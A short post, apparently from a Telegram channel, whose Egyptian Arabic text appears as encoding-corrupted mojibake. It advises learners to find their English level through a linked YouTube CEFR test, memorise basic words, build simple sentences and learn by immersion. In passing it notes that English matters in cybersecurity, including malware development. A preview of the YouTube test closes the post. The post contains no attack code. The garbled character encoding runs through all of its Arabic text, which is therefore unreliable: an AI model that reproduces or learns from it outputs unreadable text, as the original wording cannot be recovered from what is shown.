ุฏุง ูุนุฒูุฒู ู ุณุชูู ู ู ู ุณุชููุงุช ูุงูุฌููุฒู ู ู ุณุชููุงุช ูุงูุฌููุฒู ู ุนู ููู ุนุดุงู ุชุญุฏุฏ ู ุณุชูุงู ูุจู ู ุง ุชุจุฏุงุก ุชุชุนูู ุงูุฌููุฒู ุญุฏุฏ ู ุณุชูุงู ูู
ุทูุจ ุงุญุฏุฏ ุงุฒุงู ๐ค
ุจุณูุทู ุงุฏุฎู ุนูู ููุฏูู ุฏุง
https://youtu.be/NzTEZgFEr9k?si=ZZsHgaYqwcSzfolX
ุจุนุฏูุง ุจุนุฏ ู ุง ุชุญุฏุฏ ุงุจุฏุงุก ุดูู ุงูุช ู ุณุชูู ุงู ููุชุฑุถ ุงูู ู ุณุชูู A2
ุชุจุฏุงุก ุชููู ุฌู ู ุจุณูุทู ู ุน ุญูุธ ููู ุงุช ุงูุนุงุฏูู ุฒู ู ุซูุง
ุชูุงุญู : apple
ุงูุง : I
ุงุฑูุฏ : want
ุชุจุฏุงุก ุจู ููู ุงุช ุชููู ุฌู ูู
I want apple
ุงูุง ุงุฑูุฏ ุชูุงุญู
ุทูุจ ุงุชุนูู ุงุฒุงู ุจุณูููู ุ
ูุฌุจูู ู ุซุงู ุญูู ูุนุฒูุฒู ุงูุทูู ูู ุง ูุฌู ูุชุนูู ุงูููุงู ุจูุดูู ูุงุดุฎุงุต ุงูู ู ุน ุจูุชููู ู ุงุฒุงู ูุนูู ููุชุฑุถ ุจูุชููู ู ุนุฑุจู ุงูุทูู ูุชููู ุนุฑุจู
ุทุจู ู ุซุงู ุฏุง ุนููู ููู ุทูู ุจุธุจุท ูุชุจุฏุงุก ุชุฎูู ูู ุญุงุฌู ุจู ูุบู ุงูุฌููุฒูู
ู ุซูุง ุจุชูุฑุฌ ุนูู ูููู ุจูุบู ูุงูุฌููุฒู ู ุด ุชุณุชุฎุฏู ู ุชุฑุฌู
ุทูุจ ุงูุง ุงููู ูููู ุงุฒุงู ุ
ููู ุงุช ุงูู ุงูุช ู ุด ูุงูู ู ุฑูุญ ุฏูุฑ ุนูููุง ู ุงุญูุธูุง ุงููุงุณ ุงูู ุชุบุฑุจูู ู ู ุฏูู ุนุฑุจูู ุจูุดููู ุงูุชุฑุฌู ู ุจู ูุบู ูุงูุฌููุฒู ุนุดุงู ูู ุง ูุดููู ุงููุชุงุจู ู ูู ุง ู ุด ูุงูู ูู ุงูููุงู ูุฏูุฑู ู ูููู ู
ุทูุจ ุงูุง ูุณุชูุงุฏ ุงู ูู ุง ุงุชุนูู ุงูุฌููุฒู ูู ูุงู ู ุงูุณูุจุฑุงูู
ุจุนูุฏ ุนูู ูุชุนุฑู ุชูุชุจ ู ูุชููู ุงูู ุดุงูู ( error ) ู ูุชุนุฑู ุชุญู ุงูู ุดููู ุจููุณู
ุจุณ ูู ู ุฌุงูุงุช ู ุญุชุงุฌู ูุบุงุช ุฒู malware dev ( ุตูุงุนู ุงูุจุฑู ุฌูุงุช ุงูุฎุจูุซุฉ )
ูุฒู ุชุจูู ู ุชุนูู ุงูุฌููุฒู ุนุดุงู ุชุนุฑู ุชูุชุจ ูุงููุงุฏ .
ุญุงููุช ุงููู ู ูู ุจูู ุดุฆ ุดูุฑุง ูู ูุฑุงุฆู ุงูู ูุงู ุงุชู ูู ุชุดูุฑู ุงูููุงู ู ุงุดูููู ุนูู ุฎูุฑ ๐ค
YouTube
What's Your ENGLISH LEVEL? Take This Test!
Find your English level with this test based on the CEFR scale. Good luck!
๐ฏThe world's BEST English speaking app is coming soon... https://captainenglish.com
00:00 - About The Test
00:20 - Beginner Level
06:16 - Intermediate Level
13:41 - Advanced Level
๐ฏThe world's BEST English speaking app is coming soon... https://captainenglish.com
00:00 - About The Test
00:20 - Beginner Level
06:16 - Intermediate Level
13:41 - Advanced Level
โค1